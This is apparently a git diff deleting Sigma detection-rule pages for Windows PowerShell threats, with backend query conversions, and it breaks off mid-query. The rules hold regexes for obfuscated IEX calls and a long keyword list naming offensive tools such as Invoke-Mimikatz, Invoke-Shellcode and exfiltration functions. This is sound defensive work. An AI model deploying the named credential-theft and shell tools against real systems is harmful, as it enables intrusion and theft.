-| **False Positives**      | <ul><li>Penetration Test</li><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/](http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/)</li></ul>  |
-| **Author**               | Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Downgrade Attack
-id: 6331d09b-4785-4c13-980f-f96661356249
-status: experimental
-description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-references:
-    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)
-date: 2017/03/22
-modified: 2020/03/20
-logsource:
-    product: windows
-    service: powershell-classic
-detection:
-    selection:
-        EventID: 400
-        EngineVersion|startswith: '2.'
-    filter:
-        HostVersion|startswith: '2.'
-    condition: selection and not filter
-falsepositives:
-    - Penetration Test
-    - Unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Windows PowerShell | where {(($_.ID -eq "400" -and $_.message -match "EngineVersion.*2..*") -and  -not ($_.message -match "HostVersion.*2..*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_id:"400" AND winlog.event_data.EngineVersion.keyword:2.*) AND (NOT (winlog.event_data.HostVersion.keyword:2.*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6331d09b-4785-4c13-980f-f96661356249 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Downgrade Attack",
-    "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "((winlog.event_id:\"400\" AND winlog.event_data.EngineVersion.keyword:2.*) AND (NOT (winlog.event_data.HostVersion.keyword:2.*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_id:\"400\" AND winlog.event_data.EngineVersion.keyword:2.*) AND (NOT (winlog.event_data.HostVersion.keyword:2.*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Downgrade Attack'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"400" AND EngineVersion.keyword:2.*) AND (NOT (HostVersion.keyword:2.*)))
-```
-
-
-### splunk
-    
-```
-(source="Windows PowerShell" (EventCode="400" EngineVersion="2.*") NOT (HostVersion="2.*"))
-```
-
-
-### logpoint
-    
-```
-((event_id="400" EngineVersion="2.*")  -(HostVersion="2.*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*400)(?=.*2\..*)))(?=.*(?!.*(?:.*(?=.*2\..*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_exe_calling_ps.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_exe_calling_ps.md
deleted file mode 100644
index 2c55eba..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_exe_calling_ps.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | PowerShell Called from an Executable Version Mismatch       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell called from an executable by the version mismatch method |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration Tests</li><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://adsecurity.org/?p=2921](https://adsecurity.org/?p=2921)</li></ul>  |
-| **Author**               | Sean Metcalf (source), Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Called from an Executable Version Mismatch
-id: c70e019b-1479-4b65-b0cc-cd0c6093a599
-status: experimental
-description: Detects PowerShell called from an executable by the version mismatch method
-references:
-    - https://adsecurity.org/?p=2921
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Sean Metcalf (source), Florian Roth (rule)
-date: 2017/03/05
-logsource:
-    product: windows
-    service: powershell-classic
-detection:
-    selection1:
-        EventID: 400
-        EngineVersion:
-            - '2.*'
-            - '4.*'
-            - '5.*'
-        HostVersion: '3.*'
-    condition: selection1
-falsepositives:
-    - Penetration Tests
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Windows PowerShell | where {($_.ID -eq "400" -and ($_.message -match "EngineVersion.*2..*" -or $_.message -match "EngineVersion.*4..*" -or $_.message -match "EngineVersion.*5..*") -and $_.message -match "HostVersion.*3..*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"400" AND winlog.event_data.EngineVersion.keyword:(2.* OR 4.* OR 5.*) AND winlog.event_data.HostVersion.keyword:3.*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c70e019b-1479-4b65-b0cc-cd0c6093a599 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Called from an Executable Version Mismatch",
-    "description": "Detects PowerShell called from an executable by the version mismatch method",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_id:\"400\" AND winlog.event_data.EngineVersion.keyword:(2.* OR 4.* OR 5.*) AND winlog.event_data.HostVersion.keyword:3.*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"400\" AND winlog.event_data.EngineVersion.keyword:(2.* OR 4.* OR 5.*) AND winlog.event_data.HostVersion.keyword:3.*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Called from an Executable Version Mismatch'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"400" AND EngineVersion.keyword:(2.* 4.* 5.*) AND HostVersion.keyword:3.*)
-```
-
-
-### splunk
-    
-```
-(source="Windows PowerShell" EventCode="400" (EngineVersion="2.*" OR EngineVersion="4.*" OR EngineVersion="5.*") HostVersion="3.*")
-```
-
-
-### logpoint
-    
-```
-(event_id="400" EngineVersion IN ["2.*", "4.*", "5.*"] HostVersion="3.*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*400)(?=.*(?:.*2\..*|.*4\..*|.*5\..*))(?=.*3\..*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_invoke_obfuscation_obfuscated_iex.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_invoke_obfuscation_obfuscated_iex.md
deleted file mode 100644
index a898c7f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_invoke_obfuscation_obfuscated_iex.md
+++ /dev/null
@@ -1,192 +0,0 @@
-| Title                    | Invoke-Obfuscation Obfuscated IEX Invocation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block — https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniel Bohannon (@Mandiant/@FireEye), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Invoke-Obfuscation Obfuscated IEX Invocation
-id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7
-description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888"
-status: experimental
-author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-date: 2019/11/08
-tags:
-    - attack.defense_evasion
-    - attack.t1027
-logsource:
-    product: windows
-    service: powershell
-detection:
-    selection_1:
-        EventID: 4104
-    selection_2:
-        - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
-        - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
-        - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
-        - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
-        - ScriptBlockText|re: '\*mdr\*\W\s*\)\.Name'
-        - ScriptBlockText|re: '\$VerbosePreference\.ToString\('
-        - ScriptBlockText|re: '\String\]\s*\$VerbosePreference'
-    selection_3:
-        EventID: 4103
-    selection_4:
-        - Payload|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\['
-        - Payload|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\['
-        - Payload|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\['
-        - Payload|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}'
-        - Payload|re: '\*mdr\*\W\s*\)\.Name'
-        - Payload|re: '\$VerbosePreference\.ToString\('
-        - Payload|re: '\String\]\s*\$VerbosePreference'
-    condition: ( selection_1 and selection_2 ) or ( selection_3 and selection_4 )
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml): Backend does not support map values of type <class 'sigma.parser.modifiers.type.SigmaRegularExpressionModifier'>
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-((winlog.event_id:"4104" AND (ScriptBlockText:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR ScriptBlockText:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR ScriptBlockText:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR ScriptBlockText:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR ScriptBlockText:/\*mdr\*\W\s*\)\.Name/ OR ScriptBlockText:/\$VerbosePreference\.ToString\(/ OR ScriptBlockText:/\String\]\s*\$VerbosePreference/)) OR (winlog.event_id:"4103" AND (Payload:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR Payload:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR Payload:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR Payload:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR Payload:/\*mdr\*\W\s*\)\.Name/ OR Payload:/\$VerbosePreference\.ToString\(/ OR Payload:/\String\]\s*\$VerbosePreference/)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1b9dc62e-6e9e-42a3-8990-94d7a10007f7 <<EOF
-{
-  "metadata": {
-    "title": "Invoke-Obfuscation Obfuscated IEX Invocation",
-    "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1027"
-    ],
-    "query": "((winlog.event_id:\"4104\" AND (ScriptBlockText:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR ScriptBlockText:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR ScriptBlockText:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR ScriptBlockText:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR ScriptBlockText:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR ScriptBlockText:/\\$VerbosePreference\\.ToString\\(/ OR ScriptBlockText:/\\String\\]\\s*\\$VerbosePreference/)) OR (winlog.event_id:\"4103\" AND (Payload:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR Payload:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR Payload:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR Payload:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR Payload:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR Payload:/\\$VerbosePreference\\.ToString\\(/ OR Payload:/\\String\\]\\s*\\$VerbosePreference/)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_id:\"4104\" AND (ScriptBlockText:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR ScriptBlockText:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR ScriptBlockText:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR ScriptBlockText:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR ScriptBlockText:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR ScriptBlockText:/\\$VerbosePreference\\.ToString\\(/ OR ScriptBlockText:/\\String\\]\\s*\\$VerbosePreference/)) OR (winlog.event_id:\"4103\" AND (Payload:/\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[/ OR Payload:/\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[/ OR Payload:/\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[/ OR Payload:/\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}/ OR Payload:/\\*mdr\\*\\W\\s*\\)\\.Name/ OR Payload:/\\$VerbosePreference\\.ToString\\(/ OR Payload:/\\String\\]\\s*\\$VerbosePreference/)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Invoke-Obfuscation Obfuscated IEX Invocation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4104" AND (ScriptBlockText:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR ScriptBlockText:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR ScriptBlockText:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR ScriptBlockText:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR ScriptBlockText:/\*mdr\*\W\s*\)\.Name/ OR ScriptBlockText:/\$VerbosePreference\.ToString\(/ OR ScriptBlockText:/\String\]\s*\$VerbosePreference/)) OR (EventID:"4103" AND (Payload:/\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[/ OR Payload:/\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[/ OR Payload:/\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[/ OR Payload:/\$env:ComSpec\[(\s*\d{1,3}\s*,){2}/ OR Payload:/\*mdr\*\W\s*\)\.Name/ OR Payload:/\$VerbosePreference\.ToString\(/ OR Payload:/\String\]\s*\$VerbosePreference/)))
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml): Type modifier 're' is not supported by backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml): Node type not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_commandlets.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_commandlets.md
deleted file mode 100644
index 19c8673..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_malicious_commandlets.md
+++ /dev/null
@@ -1,273 +0,0 @@
-| Title                    | Malicious PowerShell Commandlets       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Commandlet names from well-known PowerShell exploitation frameworks |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration testing</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://adsecurity.org/?p=2921](https://adsecurity.org/?p=2921)</li></ul>  |
-| **Author**               | Sean Metcalf (source), Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious PowerShell Commandlets
-id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
-status: experimental
-description: Detects Commandlet names from well-known PowerShell exploitation frameworks
-modified: 2019/01/22
-references:
-    - https://adsecurity.org/?p=2921
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Sean Metcalf (source), Florian Roth (rule)
-date: 2017/03/05
-logsource:
-    product: windows
-    service: powershell
-    definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
-detection:
-    keywords:
-        Message:
-            - "*Invoke-DllInjection*"
-            - "*Invoke-Shellcode*"
-            - "*Invoke-WmiCommand*"
-            - "*Get-GPPPassword*"
-            - "*Get-Keystrokes*"
-            - "*Get-TimedScreenshot*"
-            - "*Get-VaultCredential*"
-            - "*Invoke-CredentialInjection*"
-            - "*Invoke-Mimikatz*"
-            - "*Invoke-NinjaCopy*"
-            - "*Invoke-TokenManipulation*"
-            - "*Out-Minidump*"
-            - "*VolumeShadowCopyTools*"
-            - "*Invoke-ReflectivePEInjection*"
-            - "*Invoke-UserHunter*"
-            - "*Find-GPOLocation*"
-            - "*Invoke-ACLScanner*"
-            - "*Invoke-DowngradeAccount*"
-            - "*Get-ServiceUnquoted*"
-            - "*Get-ServiceFilePermission*"
-            - "*Get-ServicePermission*"
-            - "*Invoke-ServiceAbuse*"
-            - "*Install-ServiceBinary*"
-            - "*Get-RegAutoLogon*"
-            - "*Get-VulnAutoRun*"
-            - "*Get-VulnSchTask*"
-            - "*Get-UnattendedInstallFile*"
-            - "*Get-ApplicationHost*"
-            - "*Get-RegAlwaysInstallElevated*"
-            - "*Get-Unconstrained*"
-            - "*Add-RegBackdoor*"
-            - "*Add-ScrnSaveBackdoor*"
-            - "*Gupt-Backdoor*"
-            - "*Invoke-ADSBackdoor*"
-            - "*Enabled-DuplicateToken*"
-            - "*Invoke-PsUaCme*"
-            - "*Remove-Update*"
-            - "*Check-VM*"
-            - "*Get-LSASecret*"
-            - "*Get-PassHashes*"
-            - "*Show-TargetScreen*"
-            - "*Port-Scan*"
-            - "*Invoke-PoshRatHttp*"
-            - "*Invoke-PowerShellTCP*"
-            - "*Invoke-PowerShellWMI*"
-            - "*Add-Exfiltration*"
-            - "*Add-Persistence*"
-            - "*Do-Exfiltration*"
-            - "*Start-CaptureServer*"
-            - "*Get-ChromeDump*"
-            - "*Get-ClipboardContents*"
-            - "*Get-FoxDump*"
-            - "*Get-IndexedItem*"
-            - "*Get-Screenshot*"
-            - "*Invoke-Inveigh*"
-            - "*Invoke-NetRipper*"
-            - "*Invoke-EgressCheck*"
-            - "*Invoke-PostExfil*"
-            - "*Invoke-PSInject*"
-            - "*Invoke-RunAs*"
-            - "*MailRaider*"
-            - "*New-HoneyHash*"
-            - "*Set-MacAttribute*"
-            - "*Invoke-DCSync*"
-            - "*Invoke-PowerDump*"
-            - "*Exploit-Jboss*"
-            - "*Invoke-ThunderStruck*"
-            - "*Invoke-VoiceTroll*"
-            - "*Set-Wallpaper*"
-            - "*Invoke-InveighRelay*"
-            - "*Invoke-PsExec*"
-            - "*Invoke-SSHCommand*"
-            - "*Get-SecurityPackages*"
-            - "*Install-SSP*"
-            - "*Invoke-BackdoorLNK*"
-            - "*PowerBreach*"
-            - "*Get-SiteListPassword*"
-            - "*Get-System*"
-            - "*Invoke-BypassUAC*"
-            - "*Invoke-Tater*"
-            - "*Invoke-WScriptBypassUAC*"
-            - "*PowerUp*"
-            - "*PowerView*"
-            - "*Get-RickAstley*"
-            - "*Find-Fruit*"
-            - "*HTTP-Login*"
-            - "*Find-TrustedDocuments*"
-            - "*Invoke-Paranoia*"
-            - "*Invoke-WinEnum*"
-            - "*Invoke-ARPScan*"
-            - "*Invoke-PortScan*"
-            - "*Invoke-ReverseDNSLookup*"
-            - "*Invoke-SMBScanner*"
-            - "*Invoke-Mimikittenz*"
-            - "*Invoke-AllChecks*"
-    false_positives:
-        - Get-SystemDriveInfo  # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1
-    condition: keywords and not false_positives
-falsepositives:
-    - Penetration testing
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "Message.*.*Invoke-DllInjection.*" -or $_.message -match "Message.*.*Invoke-Shellcode.*" -or $_.message -match "Message.*.*Invoke-WmiCommand.*" -or $_.message -match "Message.*.*Get-GPPPassword.*" -or $_.message -match "Message.*.*Get-Keystrokes.*" -or $_.message -match "Message.*.*Get-TimedScreenshot.*" -or $_.message -match "Message.*.*Get-VaultCredential.*" -or $_.message -match "Message.*.*Invoke-CredentialInjection.*" -or $_.message -match "Message.*.*Invoke-Mimikatz.*" -or $_.message -match "Message.*.*Invoke-NinjaCopy.*" -or $_.message -match "Message.*.*Invoke-TokenManipulation.*" -or $_.message -match "Message.*.*Out-Minidump.*" -or $_.message -match "Message.*.*VolumeShadowCopyTools.*" -or $_.message -match "Message.*.*Invoke-ReflectivePEInjection.*" -or $_.message -match "Message.*.*Invoke-UserHunter.*" -or $_.message -match "Message.*.*Find-GPOLocation.*" -or $_.message -match "Message.*.*Invoke-ACLScanner.*" -or $_.message -match "Message.*.*Invoke-DowngradeAccount.*" -or $_.message -match "Message.*.*Get-ServiceUnquoted.*" -or $_.message -match "Message.*.*Get-ServiceFilePermission.*" -or $_.message -match "Message.*.*Get-ServicePermission.*" -or $_.message -match "Message.*.*Invoke-ServiceAbuse.*" -or $_.message -match "Message.*.*Install-ServiceBinary.*" -or $_.message -match "Message.*.*Get-RegAutoLogon.*" -or $_.message -match "Message.*.*Get-VulnAutoRun.*" -or $_.message -match "Message.*.*Get-VulnSchTask.*" -or $_.message -match "Message.*.*Get-UnattendedInstallFile.*" -or $_.message -match "Message.*.*Get-ApplicationHost.*" -or $_.message -match "Message.*.*Get-RegAlwaysInstallElevated.*" -or $_.message -match "Message.*.*Get-Unconstrained.*" -or $_.message -match "Message.*.*Add-RegBackdoor.*" -or $_.message -match "Message.*.*Add-ScrnSaveBackdoor.*" -or $_.message -match "Message.*.*Gupt-Backdoor.*" -or $_.message -match "Message.*.*Invoke-ADSBackdoor.*" -or $_.message -match "Message.*.*Enabled-DuplicateToken.*" -or $_.message -match "Message.*.*Invoke-PsUaCme.*" -or $_.message -match "Message.*.*Remove-Update.*" -or $_.message -match "Message.*.*Check-VM.*" -or $_.message -match "Message.*.*Get-LSASecret.*" -or $_.message -match "Message.*.*Get-PassHashes.*" -or $_.message -match "Message.*.*Show-TargetScreen.*" -or $_.message -match "Message.*.*Port-Scan.*" -or $_.message -match "Message.*.*Invoke-PoshRatHttp.*" -or $_.message -match "Message.*.*Invoke-PowerShellTCP.*" -or $_.message -match "Message.*.*Invoke-PowerShellWMI.*" -or $_.message -match "Message.*.*Add-Exfiltration.*" -or $_.message -match "Message.*.*Add-Persistence.*" -or $_.message -match "Message.*.*Do-Exfiltration.*" -or $_.message -match "Message.*.*Start-CaptureServer.*" -or $_.message -match "Message.*.*Get-ChromeDump.*" -or $_.message -match "Message.*.*Get-ClipboardContents.*" -or $_.message -match "Message.*.*Get-FoxDump.*" -or $_.message -match "Message.*.*Get-IndexedItem.*" -or $_.message -match "Message.*.*Get-Screenshot.*" -or $_.message -match "Message.*.*Invoke-Inveigh.*" -or $_.message -match "Message.*.*Invoke-NetRipper.*" -or $_.message -match "Message.*.*Invoke-EgressCheck.*" -or $_.message -match "Message.*.*Invoke-PostExfil.*" -or $_.message -match "Message.*.*Invoke-PSInject.*" -or $_.message -match "Message.*.*Invoke-RunAs.*" -or $_.message -match "Message.*.*MailRaider.*" -or $_.message -match 